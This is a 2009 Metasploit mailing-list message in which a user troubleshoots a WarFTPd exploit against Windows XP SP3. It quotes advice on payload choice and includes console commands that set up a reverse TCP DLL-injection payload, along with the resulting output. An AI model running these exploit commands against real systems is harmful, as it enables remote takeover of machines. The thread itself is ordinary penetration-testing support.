Metasploit mailing list archives

Re: Exploit failed: a target has not been selected


From: Jun Koi <junkoi2004 () gmail com>
Date: Tue, 3 Nov 2009 22:39:35 +0900

On Thu, Oct 29, 2009 at 2:41 PM, Jun Koi <junkoi2004 () gmail com> wrote:
On Wed, Oct 28, 2009 at 7:31 PM, HD Moore <hdm () metasploit com> wrote:
On Wed, 2009-10-28 at 18:38 +0900, Jun Koi wrote:

Now another problem is: my Windows is XP SP3, and the exploitation
with Payload windows/shell/reverse_nonx_tcp doesnt work: the warftpd
server crashes.

I just added a SP3 target, svn up and set TARGET 3. That is a weird
payload to use - try windows/meterpreter/reverse_tcp instead.


That works excellently now, thanks!

But when I tried another payload to inject DLL file:

set PAYLOAD windows/dllinject/reverse_tcp
set DLL data/meterpreter/metsrv.dll
set target 3
exploit

Butn then metasploit seems to hang at the "sending stage" step:

[*] Connecting to FTP server 10.0.0.10:21...
[*] Started reverse handler
[*] Connected to target FTP server.
[*] Trying target Windows XP SP3 English...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (719360 bytes)


I waited for a while, but nothing happend.

Is it a bug that needs a fix, too?

Anybody knows how to fix the problem with this DLL injection payload
(windows/dllinject/reverse_tcp)?

Thanks,
Jun
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: